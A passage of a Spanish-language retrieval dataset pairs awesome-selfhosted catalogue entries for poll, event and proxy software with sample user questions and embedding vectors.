-0.02194, -0.01242, 0.03746, -0.01805, 0.08979, -0.05223, -0.04689, -0.11591, 0.08244, 0.10312, -0.01639, -0.0363, -0.01326, -0.05707, -0.05413, 0.02662, -0.01618, -0.11022, -0.07323, 0.02067, 0.00822, -0.03518, 0.0747, -0.0743]} -{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: Fider β€” Open platform to collect and prioritize feedback (alternative to UserVoice) [MIT, Docker]. Formbricks β€” Experience Management Suite built on the largest open source survey stack worldwide. Gracefully gather feedback at every step of the customer journey to know what your customers need [AGPL-3.0, Nodejs/Docker]. Framadate β€” Online service for planning an appointment or make a decision quickly and easily: Make a poll, Define dates or subjects to choose, Send the poll link to your friends or colleagues, Discuss and make a decision [CECILL-B, PHP]. Gancio β€” Local community event and agenda sharing [AGPL-3.0, Nodejs]. gathio β€” Self-destructing, shareable, no-registration event pages [GPL-3.0, Nodejs/Docker]. HeyForm β€” Form builder that allows anyone to create engaging conversational forms for surveys, questionnaires, quizzes, and polls [AGPL-3.0, Docker]. hitobito β€” Manage complex group hierarchies with members, events and a lot more [AGPL-3.0, Ruby].", "indexar": "que herramienta sirve para hacer peticiones o votaciones rΓ‘pidas en grupos?", "v": [0.05698, 0.12189, -0.19202, -0.13789, 0.03905, -0.08147, 0.05127, -0.06207, 0.12745, -0.15515, 0.04079, -0.0933, 0.09685, -0.08664, 0.10284, 0.00801, 0.09795, -0.02915, 0.06994, 0.04905, -0.03215, -0.03406, -0.01504, -0.01038, -0.14045, -0.0235, 0.09585, 0.03329, -0.13809, 0.11141, -0.01433, -0.07501, -0.09294, -0.03371, -0.10966, -0.07035, -0.00188, 0.02464, 0.0135, 0.03725, -0.0995, 0.06721, -0.10556, -0.1063, 0.0092, -0.01241, -0.07705, 0.09326, -0.0111, 0.05167, 0.00873, -0.1201, -0.09381, -0.01092, -0.09021, -0.08012, 0.14392, -0.21055, -0.06268, -0.13789, -0.10538, -0.02883, 0.01454, -0.07968, 0.02959, 0.12429, 0.01072, -0.02575, 0.06862, 0.10624, -0.08429, -0.06572, 0.05946, -0.03861, -0.00738, -0.0231, -0.013, -0.04281, -0.00361, -0.01181, 0.10998, -0.004, -0.08808, -0.10405, -0.00666, 0.01822, 0.00256, -0.0222, -0.02522, -0.04338, 0.00872, 0.12357, 0.10447, 0.05536, 0.08996, -0.02595, 0.02096, 0.0499, 0.01447, 0.00077, 0.06981, -0.14938, -0.08143, 0.01696, -0.00131, -0.01413, -0.06304, -0.02759, -0.03455, 0.05946, 0.05568, 0.07803, -0.0128, 0.03619, 0.11684, -0.00021, -0.0913, -0.00656, -0.03591, 0.04436, 0.07118, 0.02176, -0.11043, -0.07382, -0.02125, -0.02654, 0.04438, -0.0102, -0.00023, -0.03667, -0.00566, 0.00711, -0.10906, -0.02163, -0.02646, -0.05222, -0.03105, -0.02238, 0.08826, -0.07349, 0.04633, 0.095, -0.01806, -0.16302, 0.00371, 0.03091, 0.04907, -0.01816, 0.09589, 0.05425, 0.04855, -0.08285, -0.05109, -0.03015, -0.05116, -0.03142, -0.01256, -0.05472, -0.11576, 0.01874, -0.03085, -0.03639, 0.04452, -0.01747, 0.00472, -0.077, -0.0292, 0.03533, 0.02966, 0.06772, 0.01562, 0.02469, 0.02989, -0.04645, 0.04529, -0.03841, -0.05877, 0.06007, 0.01296, -0.02997, -0.02058, 0.00648, -0.01304, 0.00287, 0.07443, -0.01429, 0.06181, -0.01841, 0.0731, 0.07521, 0.0375, 0.05011, -0.00471, -0.00949, -0.00899, 0.05017, 0.01134, -0.04922, 0.02371, -0.05739, -0.04939, -0.04151, -0.02292, -0.03912, -0.01595, 0.06012, -0.01864, -0.00067, 0.10475, 0.02064, 0.04321, 0.0521, 0.02287, 0.04762, -0.0017, -0.01575, 0.02628, 0.03505, -0.05367, -0.02102, -0.01932, -0.01444, 0.031, 0.01816, 0.03304, 0.06189, 0.04173, -0.03777, 0.00138, 0.02966, 0.07219, -0.03012, -0.03815, -0.06924, 0.03338, -0.04304, 0.04304, -0.0026, -0.05368, 0.01719, 0.06269, 0.00198, -0.02187, 0.00942, -0.01408, -0.02422, -0.04977, -0.02239, -0.01338, -0.06728, -0.04631, -0.00447, 0.05134, -0.04256, 0.09003, -0.04981]} -{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: LimeSurvey β€” Feature-rich web-based polling software. Supports extensive survey logic [GPL-2.0, PHP]. Meetable β€” Minimal events aggregator [MIT, PHP]. Mobilizon β€” Federated tool that helps you find, create and organise events and groups [AGPL-3.0, Elixir/Docker]. OpnForm β€” Beautiful open-source form builder [AGPL-3.0, PHP/Nodejs/Docker]. Revel β€” Community-focused event management and ticketing platform [⚠, MIT, Python/Docker].", "indexar": "con quΓ© puedo hacer encuestas online de forma gratuita?", "v": [0.03897, 0.14829, -0.02096, -0.01544, 0.01556, 0.05276, -0.00074, -0.04526, -0.11648, -0.18811, -0.00813, 0.02086, 0.05531, -0.07281, 0.02619, 0.03914, 0.13944, 0.06953, 0.1147, 0.02795, 0.03211, -0.16767, -0.07506, -0.09024, -0.09817, -0.07614, -0.02869, -0.0247, 0.05695, 0.0446, 0.01275, 0.00896, -0.01705, 0.09047, -0.04513, 0.13485, 0.08342, 0.16767, 0.0873, -0.04373, 0.04666, 0.0444, -0.07115, -0.03647, -0.03679, 0.00428, -0.05739, -0.01781, 0.03962, -0.1362, -0.04457, -0.14019, -0.05504, -0.03466, -0.04094, -0.01253, 0.13422, -0.14089, 0.07594, -0.06264, -0.0346, -0.00948, 0.09106, 0.09571, -0.03266, 0.01348, 0.07199, -0.00612, -0.00521, 0.00781, 0.05198, 0.04581, -0.03435, -0.00637, -0.0218, 0.08589, -0.10212, -0.02414, 0.00852, 0.02442, 0.00775, -0.0177, 0.01218, 0.00767, -0.09854, -0.03753, -0.08232, -0.07591, -0.01854, -0.0588, 0.04105, 0.08733, 0.06348, 0.10698, -0.13057, -0.11917, 0.05158, -0.03537, 0.03746, 0.04443, -0.04545, -0.01857, -0.02908, 0.07441, -0.01147, 0.00321, -0.00244, -0.03574, -0.05283, 0.04051, 0.08384, 0.04041, -0.08876, 0.00917, 0.06459, 0.01914, 0.00728, 0.07981, -0.027, -0.04886, 0.00682, 0.13434, -0.0481, -0.06058, -0.01837, -0.02228, 0.08124, 0.02476, -0.00912, 0.00077, 0.02669, -0.0083, -0.04195, -0.04789, 0.05723, -0.06741, -0.01159, -0.08412, 0.02856, -0.13254, 0.05462, 0.07913, -0.04265, -0.06081, 0.06474, -0.08396, 0.04302, -0.07985, -0.05634, -0.0752, 0.01195, 0.05404, 0.03316, 0.03829, 0.06402, -0.09276, -0.03091, -0.05538, -0.04214, 0.07495, 0.03331, -0.00581, 0.00723, 0.04087, 0.00374, 0.01135, 0.01819, -0.06078, 0.00807, 0.05339, -0.02611, 0.04789, -0.00602, -0.10566, 0.08877, 0.07235, -0.01618, 0.02896, -0.00991, -0.12957, -0.00221, 0.04256, -0.02601, -0.04301, -0.01681, 0.00755, 0.05255, -0.03504, 0.02638, 0.06925, -0.02931, -0.02243, -0.02947, 0.08396, 0.13508, -0.04114, 0.05287, 0.02734, -0.00301, -0.01134, -0.14005, -0.07364, -0.01658, -0.02456, -0.07566, 0.02716, -0.00277, 0.07618, 0.02948, 0.04159, -0.004, -0.08763, 0.01219, -0.1644, 0.04021, 0.04913, 0.05887, -0.0832, -0.04694, -0.0032, 0.01309, 0.00333, 0.05904, 0.03833, 0.07116, 0.09299, 0.0644, 0.02636, 0.05853, 0.0209, 0.06673, -0.039, -0.01366, -0.05687, 0.02627, -0.03191, 0.06063, -0.00322, -0.06105, -0.01963, 0.05199, 0.05589, -0.02988, -0.00049, -0.00392, -0.09498, -0.04554, -0.00651, -0.03576, -0.11594, -0.10751, 0.04633, 0.03505, 0.01686, 0.05713, -0.00923]} -{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: LimeSurvey β€” Feature-rich web-based polling software. Supports extensive survey logic [GPL-2.0, PHP]. Meetable β€” Minimal events aggregator [MIT, PHP]. Mobilizon β€” Federated tool that helps you find, create and organise events and groups [AGPL-3.0, Elixir/Docker]. OpnForm β€” Beautiful open-source form builder [AGPL-3.0, PHP/Nodejs/Docker]. Revel β€” Community-focused event management and ticketing platform [⚠, MIT, Python/Docker].", "indexar": "quΓ© herramienta sirve para organizar eventos y grupos federados?", "v": [-0.09043, 0.03444, -0.14428, -0.19682, 0.02207, -0.09293, -0.02184, -0.02094, -0.03884, -0.18418, -0.18217, -0.00141, -0.05892, -0.08169, 0.11772, 0.06397, 0.1408, -0.12292, 0.02746, -0.01542, -0.10772, 0.04465, -0.0084, -0.03583, -0.07967, -0.14456, 0.12489, 0.03142, -0.13068, 0.02686, 0.06547, 0.02077, 0.00557, -0.08657, -0.00066, -0.03962, 0.00982, 0.09326, -0.1509, -0.02005, -0.1718, 0.01397, -0.11958, -0.02037, 0.0331, -0.00912, -0.12565, 0.06785, 0.01199, 0.08049, 0.03891, -0.03729, -0.0359, -0.02174, -0.11119, -0.14178, -0.09502, -0.20215, -0.06801, -0.00553, -0.13427, -0.04737, -0.07515, 0.02493, 0.07368, 0.06491, 0.00333, -0.03533, 0.02216, 0.02509, -0.06311, -0.1106, 0.01307, 0.00149, -0.06398, 0.05936, 0.07608, 0.09878, -0.04639, 0.08599, 0.02362, 0.06981, -0.04609, 0.0576, -0.03112, -0.06879, 0.05957, 0.04806, 0.00687, -0.04648, -0.04364, 0.07404, 0.02158, -0.06261, -0.00571, -0.08639, 0.0855, 0.00559, 0.0388, 0.0311, 0.10958, -0.06612, -0.04954, 0.03208, -0.08099, -0.01225, -0.02132, 0.09432, 0.037, 0.00866, 0.04352, 0.04193, 0.01804, 0.07995, 0.04838, 0.00245, 0.02937, -0.03483, 0.11081, 0.0017, 0.04414, 0.03079, -0.01609, -0.03256, -0.03194, 0.02163, 0.04496, 0.15818, -0.00802, 0.00202, 0.05498, -0.02151, -0.09277, 0.1042, -0.05356, -0.06964, -0.04731, -0.07766, 0.06227, -0.03468, -0.01956, 0.05132, -0.05969, -0.13991, 0.0349, 0.0369, 0.07036, 0.0044, 0.00735, 0.07512, 0.05988, -0.04477, -0.07024, 0.03134, -0.05424, -0.01987, -0.09609, -0.01049, 0.00369, -0.02674, -0.1285, -0.02787, 0.0644, -0.06221, 0.0182, 0.00357, 0.03495, 0.00746, 0.02841, 0.09307, 0.03447, 0.0228, 0.08311, -0.05105, -0.00583, -0.01663, -0.06986, -0.02935, 0.02383, -0.02668, 0.03627, 0.01738, -0.01962, -0.01185, 0.03256, -0.01935, 0.05226, 0.00257, 0.05363, 0.01538, 0.01516, 0.03607, 0.01851, -0.10426, 0.04355, -0.01092, -0.05667, -0.06775, 0.03769, -0.02625, 0.02363, -0.03322, 0.02092, 0.05209, 0.02294, 0.00598, -0.03839, 0.00869, 0.05216, 0.07243, 0.05631, 0.0169, 0.03652, 0.00615, -0.06457, 0.00697, -0.00569, 0.0456, 0.00952, 0.01072, 0.00549, 0.00294, 0.01899, -0.02545, 0.02901, -0.01799, -0.00276, -0.00146, 0.04985, 0.0213, 0.03076, -0.03556, 0.01882, 0.06526, 0.00357, -0.057, 0.06057, -0.0118, -0.01824, 0.03029, -0.01559, 0.02005, -0.02102, 0.00465, -0.04707, -0.04494, 0.00245, 0.02229, -0.06926, -0.04658, 0.02184, -0.01586, 0.06035, -0.03368, 0.02535, 0.01413]} -{"tipo": "pregunta", "herramienta": "Polls and Events", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Polls and Events", "tema": "polls and events", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Polls and Events: LimeSurvey β€” Feature-rich web-based polling software. Supports extensive survey logic [GPL-2.0, PHP]. Meetable β€” Minimal events aggregator [MIT, PHP]. Mobilizon β€” Federated tool that helps you find, create and organise events and groups [AGPL-3.0, Elixir/Docker]. OpnForm β€” Beautiful open-source form builder [AGPL-3.0, PHP/Nodejs/Docker]. Revel β€” Community-focused event management and ticketing platform [⚠, MIT, Python/Docker].", "indexar": "que programa hay para gestionar tickets y eventos comunitarios sin pagar?", "v": [0.02064, 0.07565, -0.11566, -0.27341, 0.00827, -0.1142, 0.0936, 0.01463, -0.08296, -0.10311, -0.06252, -0.0233, 0.02086, -0.00491, 0.01743, 0.02662, 0.10137, -0.03449, 0.19382, 0.03357, -0.09257, 0.09821, 0.10666, -0.05105, -0.05069, 0.03347, 0.0796, -0.06524, -0.01653, 0.03669, 0.06478, -0.05636, 0.00082, -0.13618, 0.09801, 0.00153, 0.05468, 0.02918, -0.04686, -0.09894, -0.04684, -0.04483, -0.04011, -0.0273, 0.0031, -0.0873, 0.0052, 0.02528, -0.0204, -0.13444, -0.07421, 0.03828, -0.08227, 0.00502, 0.06599, -0.0506, -0.14576, -0.14126, -0.11751, -0.04221, -0.1121, 0.04204, -0.05875, 0.05015, -0.02662, 0.13056, 0.10805, 0.03726, 0.00904, 0.04143, -0.10854, -0.00885, 0.05516, 0.08403, 0.01089, -0.00067, 0.12586, -0.02563, 0.00319, -0.03119, 0.02137, 0.02971, 0.0824, 0.06531, -0.0258, -0.00754, 0.03528, -0.10741, -0.01899, 0.07518, 0.07432, 0.0386, 0.04358, -0.06789, -0.00693, -0.06864, 0.10609, -0.00055, -0.03418, 0.03126, -0.04887, -0.03742, -0.07566, -0.00414, -0.07116, 0.07118, 0.09461, 0.02902, 0.04642, 0.06028, -0.01721, -0.02227, -0.03134, -0.06486, -0.01583, 0.12235, 0.05835, 0.01441, 0.10899, 0.02241, -0.01817, -0.02748, 0.02312, -0.07709, 0.15604, 0.0226, -0.03175, 0.15639, 0.04378, 0.10929, -0.01879, 0.0281, 0.0381, 0.01732, -0.06132, -0.05201, -0.04863, -0.02191, -0.00103, -0.04726, 0.01184, 0.06911, 0.02688, 0.00636, 0.11517, -0.05317, -0.03288, -0.06307, -0.02629, 0.0607, 0.03188, -0.00684, -0.02641, 0.06628, -0.08437, -0.06886, 0.00593, -0.02278, -0.10469, 0.00928, -0.09838, -0.02242, 0.00346, -0.01913, 0.04419, -0.04291, -0.02662, 0.01343, 0.04542, 0.06813, 0.02937, 0.03495, 0.11631, 0.00297, 0.03954, -0.06966, -0.01508, -0.15092, 0.06469, -0.0396, -0.04913, 0.03604, 0.04243, -0.00325, -0.02438, -0.01744, -0.03216, 0.06002, 0.03075, 0.02894, 0.03976, 0.01554, 0.03401, -0.03115, -0.01411, -0.04561, -0.09391, -0.04936, -0.05564, 0.02047, -0.05559, 0.06476, 0.06222, 0.03381, 0.03681, 0.02816, 0.03154, 0.0698, 0.08143, 0.06736, 0.00299, -0.00173, 0.02817, -0.02039, -0.07733, -0.02332, 0.04663, 0.01007, 0.05476, 0.03732, 0.00881, -0.00929, 0.00594, 0.02356, 0.03737, -0.12921, 0.03644, 0.03188, 0.04202, 0.01878, -0.04818, 0.03642, 0.00894, 0.04655, 0.04986, -0.00784, 0.07039, -0.04647, -0.0492, -0.04524, 0.01018, 0.05112, 0.03866, -0.03967, -0.07477, 0.02572, -0.09376, -0.00327, 0.0117, 0.0199, 0.03231, 0.02329, 0.04213, -0.00378, 0.05885, 0.01542]} -{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: g3proxy β€” Forward proxy server supporting proxy chaining, protocol inspection, MITM Interception, ICAP adaptation and transparent proxy [Apache-2.0, Rust/deb]. GitProxy β€” Proxy for Git that applies rules and workflows to all outgoing git push operations and ensures they are compliant. It supports both HTTP/HTTPS and SSH protocols with security scanning and validation [Apache-2.0, Nodejs/Docker]. imgproxy β€” Fast and secure standalone server for resizing and converting remote images [MIT, Go/Docker/K8S]. iodine β€” IPv4 over DNS tunnel solution, enabling you to start up a socks5 proxy listener [ISC, C/deb]. Outline Server β€” A proxy server that runs a Shadowsocks instance for each access key and a REST API to manage the access keys [Apache-2.0, Docker/Nodejs]. Privoxy β€” Non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk [GPL-2.0, C/deb].", "indexar": "que programa sirve para crear un servidor de proxy que pueda conectar varios dispositivos entre sΓ­?", "v": [-0.01615, 0.11367, -0.27913, -0.15104, 0.08325, -0.18708, 0.04178, -0.07817, -0.00714, -0.10928, -0.05058, -0.02727, 0.01917, -0.16646, -0.00086, 0.00175, 0.1287, -0.09586, 0.07478, 0.05333, 0.03789, 0.04861, 0.008, -0.0659, -0.02653, 0.08288, 0.12708, -0.04525, -0.11538, -0.0598, -0.01509, -0.02242, 0.10274, -0.01462, -0.01031, -0.08786, -0.03059, 0.14453, -0.01225, 0.04291, 0.0232, -0.058, -0.04972, 0.0457, 0.03699, -0.00168, 0.05918, -0.09451, 0.05695, 0.02801, -0.09946, -0.02672, -0.16865, 0.03661, -0.03158, -0.05308, 0.03021, -0.22895, 0.0224, -0.03038, -0.11754, -0.03248, -0.00832, -0.11347, 0.07587, -0.0034, -0.04726, -0.00373, -0.12037, -0.02175, -0.02957, -0.00498, 0.00538, -0.0456, 0.04735, 0.12942, -0.04546, -0.06123, 0.04747, 0.02483, 0.03724, 0.0058, 0.01279, 0.01674, -0.11164, -0.01931, 0.02046, 0.02682, 0.07586, -0.02956, 0.06892, 0.10261, -0.0078, 0.03783, 0.0575, -0.03865, 0.1384, -0.02817, 0.05522, 0.01228, 0.13173, 0.01484, -0.08005, 0.10993, -0.08097, 0.07042, 0.09478, -0.03372, 0.04603, 0.02121, 0.04586, -0.04135, 0.00283, -0.08662, -0.07122, -0.05615, -0.00599, -0.02249, 0.07168, 0.05803, -0.08332, -0.04448, 0.00253, 0.04084, 0.06435, -0.00503, -0.01752, 0.05478, 0.00104, 0.0832, 0.04045, -0.01532, 0.00957, -0.0364, -0.09175, 0.00319, 0.06368, -0.07552, -0.07522, -0.09467, 0.07952, 0.06924, -0.03913, -0.03834, 0.04964, 0.00947, 0.0448, -0.02348, -0.03052, 0.03732, -0.00713, 0.01298, -0.08504, 0.04804, -0.11471, 0.0124, -0.01428, -0.06774, -0.03162, 0.08395, -0.02259, 0.04359, 0.00668, 0.0367, 0.01762, -0.0414, -0.06005, -0.00359, 0.1593, 0.07994, -0.10043, 0.0577, 0.0348, -0.06299, -0.03418, 0.01171, -0.03358, -0.07861, 0.04643, -0.01489, -0.06797, 0.01125, -0.01236, -0.03577, -0.03936, -0.02248, -0.0148, 0.00608, -0.01099, 0.06143, -0.02279, 0.04351, -0.04367, 0.0481, 0.04405, -0.09568, -0.04405, -0.05828, 0.01396, -0.00512, -0.05368, -0.02059, 0.00476, -0.01523, 0.01028, 0.03078, -0.02814, 0.01675, 0.04964, 0.08482, 0.02531, -0.06762, 0.07807, -0.01244, -0.01799, -0.01565, 0.04075, -0.04881, 0.01456, 0.02219, -0.00519, 0.01977, -0.0096, 0.02779, 0.01676, 0.00011, 0.01112, 0.01112, 0.05067, -0.02216, -0.03621, -0.01866, -0.01927, -0.03197, 0.02031, 0.0189, 0.02652, -0.0694, -0.02522, -0.04494, -0.01206, 0.0882, -0.01068, -0.04962, -0.01672, -0.03949, -0.04109, 0.01383, -0.02544, -0.08227, -0.02142, 0.03383, 0.04518, -0.04246, 0.02798, 0.00868]} -{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: g3proxy β€” Forward proxy server supporting proxy chaining, protocol inspection, MITM Interception, ICAP adaptation and transparent proxy [Apache-2.0, Rust/deb]. GitProxy β€” Proxy for Git that applies rules and workflows to all outgoing git push operations and ensures they are compliant. It supports both HTTP/HTTPS and SSH protocols with security scanning and validation [Apache-2.0, Nodejs/Docker]. imgproxy β€” Fast and secure standalone server for resizing and converting remote images [MIT, Go/Docker/K8S]. iodine β€” IPv4 over DNS tunnel solution, enabling you to start up a socks5 proxy listener [ISC, C/deb]. Outline Server β€” A proxy server that runs a Shadowsocks instance for each access key and a REST API to manage the access keys [Apache-2.0, Docker/Nodejs]. Privoxy β€” Non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk [GPL-2.0, C/deb].", "indexar": "cual es una alternativa libre a g3proxy para gestionar proxies con inspecciΓ³n profunda del trΓ‘fico?", "v": [0.04149, -0.04563, -0.1655, -0.08462, 0.08659, 0.01186, 0.11308, 0.02984, 0.00422, -0.04086, 0.09771, -0.06115, -0.01209, 0.04504, 0.03184, -0.12531, 0.04485, -0.1242, -0.01448, 0.07598, -0.15189, 0.05437, -0.05623, -0.1941, 0.03499, -0.12066, -0.07524, -0.05133, -0.10352, -0.09348, -0.07412, -0.03524, 0.07803, -0.04513, -0.02155, -0.06021, 0.08066, 0.09517, 0.15427, -0.10477, 0.01888, -0.19966, -0.05244, 0.04592, 0.1426, -0.18014, -0.08203, -0.01116, -0.14608, -0.025, -0.16794, -0.05762, -0.11894, -0.00438, 0.00076, -0.05524, -0.00215, -0.10389, -0.06192, -0.01944, 0.01594, 0.05924, 0.02216, -0.05454, -0.0314, -0.04738, 0.11251, 0.08969, -0.10553, 0.01621, 0.05245, -0.05669, -0.02977, 0.03715, -0.01049, -0.07342, 0.04326, 0.11732, 0.02434, 0.08233, 0.06931, 0.03929, -0.06082, -0.01787, -0.025, -0.01273, -0.06285, -0.05159, 0.0331, 0.08342, 0.00821, -0.03373, -0.0805, -0.01794, 0.02398, 0.04123, 0.03481, -0.03165, 0.02422, 0.01919, 0.14269, -0.00703, -0.16492, 0.04048, -0.03045, 0.07386, -0.0708, -0.00181, -0.04205, 0.09595, 0.02163, 0.08123, -0.03994, -0.069, 0.01333, -0.02171, -0.06586, 0.06173, -0.03258, -0.01489, -0.05391, -0.06737, -0.04642, 0.00256, 0.03583, 0.04002, -0.00247, 0.03288, 0.05089, 0.05269, 0.03117, 0.00083, -0.05379, -0.13163, -0.1104, -0.07921, 0.00785, -0.04881, -0.02736, 0.01871, -0.04106, -0.00867, 0.04936, -0.0021, 0.03651, -0.01259, -0.0402, -0.01285, 0.05465, -0.03664, -0.01097, -0.05346, 0.03162, 0.07522, 0.02245, 0.06695, -0.01502, -0.00889, -0.05955, 0.03332, 0.04481, -0.04683, -0.03311, 0.02016, 0.02894, 0.01749, -0.03173, 0.01191, -0.06177, -0.01244, -0.03791, -0.01394, 0.01797, -0.10161, 0.0246, -0.03906, -0.04048, -0.14583, 0.09164, -0.043, 0.02625, 0.01404, -0.12018, -0.02534, 0.01731, -0.01317, -0.02968, 0.1032, 0.00519, 0.0322, -0.00434, 0.0964, -0.0617, -0.08288, 0.07668, 0.00345, 0.03424, -0.0708, -0.04133, -0.02924, 0.00394, -0.04956, 0.06056, -0.01997, -0.02487, -0.05717, -0.00094, 0.01458, 0.07943, 0.03377, -0.02957, 0.00605, 0.05412, 0.01837, -0.06757, -0.01769, -0.01286, 0.02302, 0.00926, 0.0194, -0.02636, 0.04144, 0.01855, -0.03959, -0.05649, 0.01669, 0.01313, 0.07008, 0.04109, 0.00226, 0.02507, 0.07721, -0.01513, 0.00623, 0.00483, -0.0286, -0.00187, -0.04332, 0.0009, -0.03969, 0.06465, 0.04574, -0.02808, -0.01216, -0.0396, -0.02396, -0.0453, -0.02158, -0.04241, -0.03469, -0.0103, 0.08224, -0.01412, -0.03173, 0.05873, -0.04561]} -{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: g3proxy β€” Forward proxy server supporting proxy chaining, protocol inspection, MITM Interception, ICAP adaptation and transparent proxy [Apache-2.0, Rust/deb]. GitProxy β€” Proxy for Git that applies rules and workflows to all outgoing git push operations and ensures they are compliant. It supports both HTTP/HTTPS and SSH protocols with security scanning and validation [Apache-2.0, Nodejs/Docker]. imgproxy β€” Fast and secure standalone server for resizing and converting remote images [MIT, Go/Docker/K8S]. iodine β€” IPv4 over DNS tunnel solution, enabling you to start up a socks5 proxy listener [ISC, C/deb]. Outline Server β€” A proxy server that runs a Shadowsocks instance for each access key and a REST API to manage the access keys [Apache-2.0, Docker/Nodejs]. Privoxy β€” Non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk [GPL-2.0, C/deb].", "indexar": "hay alguna herramienta gratuita para redimensionar y convertir imΓ‘genes remotas desde mi servidor?", "v": [0.02057, 0.05797, -0.20514, -0.16688, -0.03286, -0.04325, -0.06639, -0.03553, -0.01718, -0.09576, -0.0546, -0.13165, 0.08826, -0.15475, 0.12215, 0.05845, 0.1341, -0.03849, 0.03467, -0.00869, 0.10142, -0.00747, -0.03082, -0.0432, -0.0933, -0.08067, 0.06803, -0.06037, -0.11454, -0.04878, 0.0896, -0.02289, 0.05689, -0.00035, -0.14069, -0.0911, 0.06221, 0.11823, -0.0048, -0.01453, 0.06898, 0.07416, -0.07474, 0.05044, 0.02653, -0.02896, -0.00598, -0.01, 0.01988, -0.00906, -0.05907, -0.08344, -0.11169, 0.01141, -0.03085, -0.14212, 0.25183, -0.16186, 0.0266, -0.05443, -0.05431, 0.09442, -0.05983, -0.05823, 0.0104, -0.06117, -0.09337, -0.11117, -0.18786, -0.00156, -0.05794, 0.01324, 0.04056, -0.00486, 0.00222, -0.022, -0.05088, -0.0882, -0.01574, -0.00524, 0.0232, 0.00943, -0.06503, 0.04473, -0.10651, -0.06925, -0.02147, -0.04579, 0.07031, -0.03518, -0.00131, 0.0416, 0.01268, 0.08123, -0.00203, -0.02515, 0.07605, -0.01975, -0.01603, -0.02376, 0.11302, 0.01158, -0.06423, 0.0412, 0.00737, 0.08757, 0.03241, -0.08222, -0.05252, -0.02657, 0.12148, -0.00817, 0.00695, -0.00625, -0.13189, -0.04526, -0.03027, -0.05414, 0.05572, 0.01469, -0.02437, 0.04339, -0.01272, 0.02534, -0.01536, -0.00051, -0.0012, 0.08151, -0.03123, -0.07937, -0.04561, -0.01773, -0.08918, -0.06108, -0.05532, -0.02137, 0.10965, -0.15419, -0.05339, -0.10816, -0.06797, 0.01846, -0.01437, -0.06346, 0.04459, 0.00686, 0.10612, -0.09082, -0.12439, 0.01485, 0.04054, -0.05582, 0.01155, 0.02039, -0.01933, 0.0659, -0.05563, -0.06782, -0.10348, 0.0144, -0.01982, -0.01906, 0.09408, 0.01177, -0.02232, -0.07028, -0.00523, -0.02476, 0.019, 0.08652, -0.03329, -0.03175, -0.01651, -0.02252, 0.0306, -0.00491, -0.04698, -0.06305, -0.03716, -0.07697, 0.02016, 0.05825, -0.01277, -0.03544, -0.00145, -0.01387, -0.01045, 0.01813, -0.01022, -0.02637, 0.01143, 0.01436, -0.03778, -0.00263, 0.08935, -0.0388, -0.0716, -0.02532, -5e-05, 0.0181, -0.0566, -0.08244, -0.05358, -0.03722, -0.00839, -0.00937, 0.01554, 0.05249, -0.05442, 0.01693, -0.03027, -0.01741, 0.04389, -0.07812, 0.01397, 0.00028, 0.06647, -0.04011, -0.05047, -0.0013, 0.00211, 0.03315, 0.05517, 0.00809, -0.00726, 0.09085, 0.02549, 0.05953, -0.00325, -0.05246, 0.01609, 0.06015, -0.01819, -0.04046, 0.00271, -0.06518, 0.03072, -0.03552, -0.03455, -0.0579, 0.01677, 0.08385, -0.00648, -0.01143, -0.04766, -0.06805, -0.01009, -0.04058, 0.01749, -0.07057, -0.00161, 0.01843, 0.04472, -0.04291, -0.01859, 0.00234]} -{"tipo": "pregunta", "herramienta": "Proxy", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Proxy", "tema": "proxy", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Proxy: sish β€” HTTP(S)/WS(S)/TCP tunnels to localhost using only SSH (serveo/ngrok alternative) [MIT, Go/Docker]. socks5-proxy-server β€” SOCKS5 proxy server with built-in authentication and Telegram-bot for user management and user statistics on data spent (handy when you pay per GB of data). It is dockerised and simple to install [Apache-2.0, Docker]. Squid β€” Caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response times by caching and reusing frequently-requested web pages [GPL-2.0, C/deb]. Tinyproxy β€” Light-weight HTTP/HTTPS proxy daemon [GPL-2.0, C/deb].", "indexar": "quΓ© herramienta sirve para crear tΓΊneles HTTP a localhost usando solo SSH?", "v": [0.03542, -0.07745, -0.19524, -0.08498, 0.05077, -0.13397, -0.11859, -0.07618, 0.1302, 0.10554, -0.25679, 0.05913, 0.03877, -0.00906, 0.00703, 0.03689, 0.04151, -0.17904, 0.05399, -0.00952, 